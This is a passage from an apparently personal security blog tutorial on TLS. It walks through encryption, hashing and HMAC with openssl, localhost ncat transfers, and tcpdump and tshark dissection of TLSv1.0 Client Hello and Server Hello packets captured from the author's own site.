<p></p><p>What does <i>tcpdump </i>see this time around?! Well, we can see the amount of bytes sent but not the actual contents, as seen in the unencrypted connections.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti lo port 80 -v -A 2>/dev/null </span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 56647, offset 0, flags [DF], proto TCP (6), length 103)</span>
<span style="color: white;"> 127.0.0.1.59900 > 127.0.0.1.80: Flags [P.], cksum 0xfe5b (incorrect -> 0xdb9b), seq 2290212426:2290212477, ack 2645254601, win 512, options [nop,nop,TS val 3446108841 ecr 3446083161], length 51: HTTP</span>
<span style="color: white;">E..g.G@.@._G...........P...J..a......[.....</span>
<span style="color: white;">.gr..g.Y........,.?.(..'...dQ..?VF$.v..`x.h....`]K...)(y.u.</span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 31739, offset 0, flags [DF], proto TCP (6), length 52)</span>
<span style="color: white;"> 127.0.0.1.80 > 127.0.0.1.59900: Flags [.], cksum 0xfe28 (incorrect -> 0xa5ae), ack 51, win 512, options [nop,nop,TS val 3446108882 ecr 3446108841], length 0</span>
<span style="color: white;">E..4{.@.@............P....a....}.....(.....</span>
<span style="color: white;">.gr..gr.</span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 31740, offset 0, flags [DF], proto TCP (6), length 114)</span>
<span style="color: white;"> 127.0.0.1.80 > 127.0.0.1.59900: Flags [P.], cksum 0xfe66 (incorrect -> 0x7609), seq 1:63, ack 51, win 512, options [nop,nop,TS val 3446132201 ecr 3446108841], length 62: HTTP</span>
<span style="color: white;">E..r{.@.@............P....a....}.....f.....</span>
<span style="color: white;">.g...gr.....9..../.H3..T..Bvs...,.>.....Jt....r .k..........@.y......U</span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 56648, offset 0, flags [DF], proto TCP (6), length 52)</span>
<span style="color: white;"> 127.0.0.1.59900 > 127.0.0.1.80: Flags [.], cksum 0xfe28 (incorrect -> 0xef18), ack 63, win 512, options [nop,nop,TS val 3446132201 ecr 3446132201], length 0</span>
<span style="color: white;">E..4.H@.@._y...........P...}..b......(.....</span>
<span style="color: white;">.g...g..</span>
</pre></div>
</div><div><br /></div><div><div>With that out of the way, let's get to the theory ....</div></div><div><br /></div><div><div><span style="font-size: large;"><br />Understanding TLS</span> </div></div><div><br />TLS is responsible for providing authentication, encryption and integrity.</div><p>Authentication:<br /> This is where each party verifies who the other claim to be. <br /> In many cases, you are going to find the client verifying (authenticating) the server.<br /> You can also have mutual authentication, where the server also verifies (authenticates) the client.</p><p>Encryption:<br /> This is where the data is encrypted as it flows on the wire.<br /> for example, let's say we had a file with the contents www.securitynik.com.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ echo "www.securitynik.com" > test.txt</span>
<span style="color: white;">$ cat test.txt </span>
<span style="color: white;">www.securitynik.com</span>
</pre></div>
<br /> Now we want to encrypt this content.<div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ </span><span style="color: white;">openssl enc -aes-256-cbc -in test.txt -out test.enc -pbkdf2 -k test -p -e
salt=03A2D1E4F026FCA5
key=4D4D864736E375BCF798E9BC871B0B372246C404490CB6ED30198B808A163093
iv =53DF5134171F4A028D0A8896F156E934</span>
</pre><div><br /></div></div>
</div><div><br /></div><div>After encryption rather than www.securitynik.com, we see</div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat test.enc </span>
<span style="color: white;">Salted__����&����g���`x��B{e�
l�)k�����
</span>
</pre></div>
</div><div><br /> Obviously, at this point there is not much we can make of the encrypted content. At this point, even if the communication channel is unencrypted, we can still pass this file on the wire without anyone being able to read the original content easily. </div><div><br /></div><div>Below we setup <i>ncat</i> to listen for the incoming file on the server side and then the client uses the encrypted file as input.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ </span><span style="color: white;">sudo ncat --verbose --listen 127.0.0.1 80
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on 127.0.0.1:80
Ncat: Connection from 127.0.0.1:47172.
</span><b><span style="color: #fcff01;">Salted__����&����g���`x��B{e�
l�)k�����</span></b><span style="color: white;">
</span>
<span><span style="color: white;">$ ncat --verbose 127.0.0.1 80 </span><b><span style="color: #fcff01;">< test.enc</span><span style="color: white;"> </span></b></span>
<span style="color: white;">Ncat: Version 7.94 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 127.0.0.1:80.</span>
<span style="color: white;">Ncat: 48 bytes sent, 1 bytes received in 0.10 seconds.</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>When we look on the wire, there is a hint that this communication is encrypted but nothing much for us to interpret via cleartext.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ sudo tcpdump -nnti lo port 80 -A 2>/dev/null</span>
<span style="color: white;">IP 127.0.0.1.47172 > 127.0.0.1.80: Flags [S], seq 767404127, win 65495, options [mss 65495,sackOK,TS val 1324986826 ecr 0,nop,wscale 7], length 0
E..<6=@.@..}.........D.P-.._.........0.........
N...........
IP 127.0.0.1.80 > 127.0.0.1.47172: Flags [S.], seq 3419229509, ack 767404128, win 65483, options [mss 65495,sackOK,TS val 1324986826 ecr 1324986826,nop,wscale 7], length 0
E..<..@.@.<..........P.D..ME-..`.....0.........
N...N.......
IP 127.0.0.1.47172 > 127.0.0.1.80: Flags [.], ack 1, win 512, options [nop,nop,TS val 1324986827 ecr 1324986826], length 0
E..46>@.@............D.P-..`..MF.....(.....
N...N...
IP 127.0.0.1.47172 > 127.0.0.1.80: Flags [P.], seq 1:49, ack 1, win 512, options [nop,nop,TS val 1324986827 ecr 1324986826], length 48: HTTP
E..d6?@.@..S.........D.P-..`..MF.....X.....
N...N...</span><b><span style="color: #fcff01;">Salted__.....&....g....`x...B.{.e.
l.)k.........</span></b><span style="color: white;">
</span>
</pre></div>
</div><div><br /></div><div> Because we used symmetric encryption, we only need the same key/password to decrypt the file on the receiver side</div><div>. </div><div><div> To decrypt, we rerun the command and add the <i>"-d"</i> option. We also change the input file to be the encrypted file while creating a new out file with the decrypted content.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ </span><span style="color: white;">openssl enc -aes-256-cbc -in test.enc -out test.dec -pbkdf2 -k test -p -d
</span>
<span style="color: white;">$ cat test.dec </span>
<span style="color: white;">www.securitynik.com</span>
</pre></div>
</div><div><br /></div><div> Awesome, we recovered the file while getting a better understanding of symmetric encryption.<br /><p></p><p>Integrity:<span style="white-space: pre;"> </span><br /> Validation that the data is not lost, damaged, tampered or falsified in any way.<br /> Normally, when we talk about integrity, we are looking at it from simply the hashing function such as MD5, SHA-*, etc.<br /> Let's hash the string "www.securitynik.com"<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ echo -n "www.securitynik.com" | openssl dgst -sha1 </span>
<span style="color: white;">SHA1(stdin)= bc95e341c9912b5e5a257d35de91f8f6d7a84b7a</span></pre></div><p> Now if a threat actor is able to see the string, it can be modified and the hash updated. This way, when the recipient receives the packet and compute the hash, it will match what the threat actor wanted. To mitigate this, Keyed-Hashing for Message Authentication is used via HMAC. With HMAC, along with the hash, we use a password/key.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ echo -n "www.securitynik.com" | openssl dgst -sha1 </span><span style="color: #fcff01;"><b>-hmac "myKey"</b></span>
<span style="color: white;">SHA1(stdin)= 0d109a1ce168f55d38bf4e0066cc6352fcd27815</span>
</pre></div>
<p></p><p>TLS consists of a Record and a Handshake Protocol. These are also called layers. The Record Protocol provides security and reliability. Security is handled via symmetric cryptography (DES, AES, RC4, etc.) for data encryption. Reliability/Message integrity, is handled via hashing algorithm such as SHA, MD5, etc. The Record protocol may also be used without encryption. When a new connection begins, the Record layer connection, hash and compression states are all set to null.</p><p>Data fragmentation/reassembly into manageable blocks, optional compression/decompression, application of MAC and encryption/decryption prior to or after transmission is all done by the Record Protocol.</p><p>The Handshake protocol allow the server and client to authenticate each other, negotiate the encryption algorithm and cryptographic keys before any data is transmitted or received.</p><p>While the Record Protocol uses symmetric algorithms for encryption, the Handshake Protocol uses asymmetric (Public Key Cryptography: RSA, DSS, etc.). Authentication can be made optional but is generally required. </p><p>Once the channel is encrypted, the data sent by the two endpoints, is only visible by those two endpoints. The TLS protocol does not hide the length of the traffic of the data being transmitted. Do keep in mind that the TLS endpoints may pad the length to reduce the effectiveness of traffic analysis techniques.</p><p>To get an understanding of the TLS communications for both TLSv1.0 and TLSv1.3, we will target my domain: www.securitynik.com. If you are wondering why not TLSv1.2 also, well that falls within 1.0 and 1.3. My expectation is if you understand 1.0 and 1.3, then you have a good understanding of what is in the middle.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sslscan www.securitynik.com | grep --perl-regexp "Subject|Altnames|(TLSv1.0|TLSv1.3)\s+enabled"</span>
<span style="color: white;">Subject: www.securitynik.com</span>
<span style="color: white;">Altnames: DNS:www.securitynik.com</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Interestingly, above does not show information about the versions of TLS enabled. I lost interest in trying to refine it :-D . Let's get this information another way. Copy and paste the output into a text editor such as vi, so you can see the actual output I am interested in.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ cat /tmp/ssl.txt | grep --perl-regexp "Subject|Altnames|(TLSv1.0|TLSv1.3)\s+enabled"</span>
<span style="color: white;">TLSv1.0 enabled</span>
<span style="color: white;">TLSv1.3 enabled</span>
<span style="color: white;">Subject: www.securitynik.com</span>
<span style="color: white;">Altnames: DNS:www.securitynik.com</span>
</pre></div>
</div><div><br /></div><div><div><br /><span style="font-size: medium;"><b>TLSv1.0 <br /></b></span><br />Was launched in January 1999 via RFC 2246.</div><div><br /></div><div>Understanding TLSv1.0 through packet analysis. Let's setup <i>tcpdump</i> to capture the traffic of interest. Note below shows the captured traffic also.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -n -w securitynik_tls1.0.pcap 'tcp port 443 and host www.securitynik.com' -v</span>
<span style="color: white;">tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">Got 338</span>
<span style="color: white;">^C338 packets captured</span>
<span style="color: white;">344 packets received by filter</span>
<span style="color: white;">0 packets dropped by kernel</span>
</pre></div>
</div><div><br /></div><div><div>Here is the <i>curl </i>command line to force curl to use <i>TLSv1.0</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ curl --verbose https://www.securitynik.com </span><b><span style="color: #fcff01;">--tlsv1.0 --tls-max 1.0</span></b><span style="color: white;"> | more</span></span>
<span style="color: white;"> % Total % Received % Xferd Average Speed Time Time Time Current</span>
<span style="color: white;"> Dload Upload Total Spent Left Speed</span>
<span style="color: white;"> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 142.251.32.83:443...</span>
<span style="color: white;">* Connected to www.securitynik.com (142.251.32.83) port 443 (#0)</span>
<span style="color: white;">* ALPN: offers h2,http/1.1</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS handshake, Client hello (1):</span>
<span style="color: white;">} [177 bytes data]</span>
<span style="color: white;">* CAfile: /etc/ssl/certs/ca-certificates.crt</span>
<span style="color: white;">* CApath: /etc/ssl/certs</span>
<span style="color: white;">{ [5 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Server hello (2):</span>
<span style="color: white;">{ [100 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Certificate (11):</span>
<span style="color: white;">{ [4212 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Server key exchange (12):</span>
<span style="color: white;">{ [298 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Server finished (14):</span>
<span style="color: white;">{ [4 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS handshake, Client key exchange (16):</span>
<span style="color: white;">} [37 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS change cipher, Change cipher spec (1):</span>
<span style="color: white;">} [1 bytes data]</span>
<span style="color: white;">* TLSv1.0 (OUT), TLS handshake, Finished (20):</span>
<span style="color: white;">} [16 bytes data]</span>
<span style="color: white;">* TLSv1.0 (IN), TLS handshake, Finished (20):</span>
<span style="color: white;">{ [16 bytes data]</span>
<span style="color: white;">* SSL connection using TLSv1 / ECDHE-RSA-AES128-SHA</span>
<span style="color: white;">* ALPN: server accepted h2</span>
<span style="color: white;">* Server certificate:</span>
<span style="color: white;">* subject: CN=www.securitynik.com</span>
<span style="color: white;">* start date: May 30 04:44:46 2023 GMT</span>
<span style="color: white;">* expire date: Aug 28 05:31:35 2023 GMT</span>
<span style="color: white;">* subjectAltName: host "www.securitynik.com" matched cert's "www.securitynik.com"</span>
<span style="color: white;">* issuer: C=US; O=Google Trust Services LLC; CN=GTS CA 1D4</span>
<span style="color: white;">* SSL certificate verify ok.</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* using HTTP/2</span>
<span style="color: white;">......</span>
</pre></div>
</div><div><br /></div><div><div>Reviewing the PCAP file.</div><div><br /></div><div>As TLS run above TCP (in this example), first, we see the TCP 3-way handshake</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -c 3</span>
<span style="color: white;"> 1 0.000000 10.0.1.128 → 142.251.32.83 TCP 74 41570 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=971727410 TSecr=0 WS=128</span>
<span style="color: white;"> 2 0.014645 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460</span>
<span style="color: white;"> 3 0.014733 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0</span>
</pre></div>
</div><div><br /></div><div>Next packet to come is the "<i>Client Hello</i>"</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">4 0.019859 10.0.1.128 → 142.251.32.83 TLSv1 236 Client Hello</span>
</pre></div>
</div><div><br /></div><div><div>Breaking the "<i>Client Hello</i>" down (well some of it). </div><div>The hello messages are used to exchange security capabilities and enhancements between the client and server. The client's hello message must be responded to by the server's hello message. If there is no response, the connection will fail. The client and server hello messages, establishes the protocol version, session ID, cipher suites and compression methods to be used. </div><div><br /></div><div>While the client normally will first send its hello as shown above, in TLSv1.0 the server may send a "<i>Hello Request</i>" asking the client to begin the negotiation process anew.</div><div><br /></div><div>Both the client and server also generate their respective random values <i>ClientHello.random </i>and <i>Server.Hello.random</i>. </div><div><br /></div><div>While there is a lot in there, we are going to focus on the most important items at this time, for the purpose of this conversation.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "tls.handshake.type == 1" -V | sed '1,81d;128,$d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Client Hello</span>
<span style="color: white;"> 1: Content Type: Handshake (22)</span>
<span style="color: white;"> 2: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> 3: Length: 177</span>
<span style="color: white;"> Handshake Protocol: Client Hello</span>
<span style="color: white;"> 4: Handshake Type: Client Hello (1)</span>
<span style="color: white;"> 5: Length: 173</span>
<span style="color: white;"> 6: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Random: d21450dca6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817</span>
<span style="color: white;"> 7: GMT Unix Time: Sep 8, 2081 04:46:20.000000000 EDT</span>
<span style="color: white;"> 8: Random Bytes: a6d7d0a53270853149ffa3bd2e6004eecaa7a50666386b6ccc26c817</span>
<span style="color: white;"> 9: Session ID Length: 0</span>
<span style="color: white;"> 10: Cipher Suites Length: 54</span>
<span style="color: white;"> 11: Cipher Suites (27 suites)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0088)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA (0x0087)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDH_anon_WITH_AES_256_CBC_SHA (0xc019)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA (0x003a)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA (0x0089)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA (0x009a)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_SEED_CBC_SHA (0x0099)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0045)</span>
<span style="color: white;"> Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA (0x0044)</span>
<span style="color: white;"> Cipher Suite: TLS_ECDH_anon_WITH_AES_128_CBC_SHA (0xc018)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA (0x0034)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA (0x009b)</span>
<span style="color: white;"> Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA (0x0046)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0084)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_SEED_CBC_SHA (0x0096)</span>
<span style="color: white;"> Cipher Suite: TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0041)</span>
<span style="color: white;"> Cipher Suite: TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff)</span>
<span style="color: white;"> 12: Compression Methods Length: 1</span>
<span style="color: white;"> 13: Compression Methods (1 method)</span>
<span style="color: white;"> 14: Compression Method: null (0)</span>
<span style="color: white;"> 15: Extensions Length: 78</span>
</pre></div>
</div><div><br /></div><div><div>1: Content Type: Because TLS was designed to allow extensions to the protocol, new content types can be added. If the other side of a TLS implementation receives a record type it does not understand, it should ignore it. </div><div><br /></div><div>Four content types are defined by default: </div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Handshake Protocol</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Alert protocol</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Change Cipher Spec Protocol</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Application Data Protocol</span></div><div><br /></div><div>2: Version: For TLSv1.0 record layer version information shows ... well ... TLS 1.0. However, looking at the brackets we see 0x0301. TLS 1.0 is a minor modification to SSL 3.0.</div><div><br /></div><div>3: Length: The length of the TLS client protocol coming next. In this case, the handshake. It has a length of 177 bytes. This fragment length should not exceed 2**14.</div><div><br /></div><div>4: Handshake Type: Client Hello (1): There are various handshake types, such as hello_request, client_hello, server_hello, certificate, server_key_exchange, certificate_request, server_hello_done, certificate_verify, client_key_exchange and finished.</div><div><br /></div><div>Above, we see the type is Client Hello</div><div><br /></div><div>5: Length: 173: There are 173 bytes coming beyond this</div><div><br /></div><div>6: Version: TLS 1.0 (0x0301) : This represents the TLS handshake protocol version. This shows TLS_1_0 is being used .</div><div><br /></div><div>7: GMT Unix Time : This represents the current time and date in seconds, since January 1, 1970 according to the client's internal clock. Interestingly, these internal clocks are not required to be set correctly. Well that is good to know. If you look closely above, it says Sep 8, 2081.</div><div><br /></div><div>8: Random: A 28 byte value generated by a secure random number generator. </div><div><br /></div><div>9: Session ID Length: When not 0 as is shown above, this session ID identifies a connection between two peers for which the client wishes to reuse the security parameters used to create the original session. This identifier may have been from a previous, current or another currently active session. Considering the third option, clients may create several independent secure connections without repeating the full handshake. In this case, the client wishes to start a new connection</div><div><br /></div><div>10: Cipher Suites Length: This represents the length in the number of bytes occupied by all the cipher suites the client is sending to the server. In this case we have 54.</div><div><br /></div><div>11: Cipher Suites: We see 27 cipher suites being passed by the client. These are cryptographic algorithms supported by the client and passed to the server in the client's order of preference. Meaning "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)" is what the client wishes to use first. The cipher suites passed defines the key exchange algorithm (ECDHE), the authentication algorithm (ECDSA), the bulk encryption algorithm, including the secret key length (AES_256_CBC) and the hashing algorithm (SHA). The server will choose one from the list. If no acceptable cipher suite is found by the server, a failure alert will be sent and the connection closed.</div><div><br /></div><div>12: Compression Methods Length: The number of bytes occupied by the Compression Methods. In this case, we see 1 byte.</div><div><br /></div><div>13: Compression Methods (1 method): This represents how many compression methods are defined. </div><div><br /></div><div>14: Compression Method: Currently, no compression method is defined. Hence null (0). If there were multiple, like the cipher suites, they would be placed in the order of preference.</div><div><br /></div><div>15: Extensions Length: I will not focus on the extension at this time. However, currently there are 78 defined.</div><div><br /></div><div>With that understanding of the key fields within the TLS Client Hello. Let's look now at the server hello.</div><div><br /></div><div>For the Client Hello, our Tshark filter was "<i>handshake.type == 1</i>", for the Server Hello, our handshake type will be 2.</div></div><div><br /></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "tls.handshake.type == 2" -V | sed '1,82d;100,$d' </span>
<span style="color: white;">Transport Layer Security </span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Server Hello </span>
<span style="color: white;"> 1: Content Type: Handshake(22) </span>
<span style="color: white;"> 2: Version: TLS 1.0 (0x0301) </span>
<span style="color: white;"> Length: 100</span>
<span style="color: white;"> Handshake Protocol: Server Hello</span>
<span style="color: white;"> 3: Handshake Type: Server Hello (2)</span>
<span style="color: white;"> Length: 96</span>
<span style="color: white;"> 4: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Random: 64b57bddd6dd95316e80d2d04a66ffcebb3f853e885b61d4444f574e47524400</span>
<span style="color: white;"> 5: GMT Unix Time: Jul 17, 2023 13:35:25.000000000 EDT</span>
<span style="color: white;"> 6: Random Bytes: d6dd95316e80d2d04a66ffcebb3f853e885b61d4444f574e47524400</span>
<span style="color: white;"> 7: Session ID Length: 32</span>
<span style="color: white;"> 8: Session ID: f943d4e522980ff86ab6371b4bd77e9dbe71cf3dbd939c54d17c08c6710a783d</span>
<span style="color: white;"> 9: Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)</span>
<span style="color: white;"> 10: Compression Method: null (0)</span>
<span style="color: white;"> 11: Extensions Length: 24</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>The server responds to a "<i>Client Hello</i>" with a "<i>Server Hello</i>", assuming that that it finds an acceptable set of algorithm.</p><p>We've discussed 1, 2 and 3 as it relates to the Client Hello. No need to repeat here. </p><p>Starting from bullet 4.</p><p>4: Handshake Type: We see handshake type 2 which is the Server Hello.</p><p>5: GMT Unix Time: This represents the current time and date in seconds, since January 1, 1970 according to the client's internal clock. Unlike the Client Hello, we do see the true date and time when this negotiation was started from the Server Hello perspective.</p><p>6: Random Bytes: Generated by the server and must be different and independent from the Client.Hello.random, whichis part of the Client Hello.</p><p>7: Session ID Length: These 32 bytes represents the value of the session ID.</p><p>8: Session ID: If this was an attempt to reuse an existing ID and the server is willing to establish the connection, then the "Session ID" sent via the Client Hello would be reused here. However, above, we saw the Client Hello had a Session ID of 0. As a result, the value in this field represents a new Session ID. It is also possible for the server to respond with an empty Session ID, meaning this session will not be cached and thus cannot be resumed.</p><p>9: Cipher Suite: Where as the Client Hello had 27 cipher suites above, the server hello will have one. This is the one selected from the client's list chosen by the server. If the session was resumed, this will be the value from the resumed session. The choice made in this case is TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)</p><p>10: Compression Method: null (0). No compression is being used here.</p><p>11: Extensions Length: 24. While there are 24 extensions, like the Client Hello extensions, we are not going to cover those. </p><p>Looking at handshake type 11 - Server 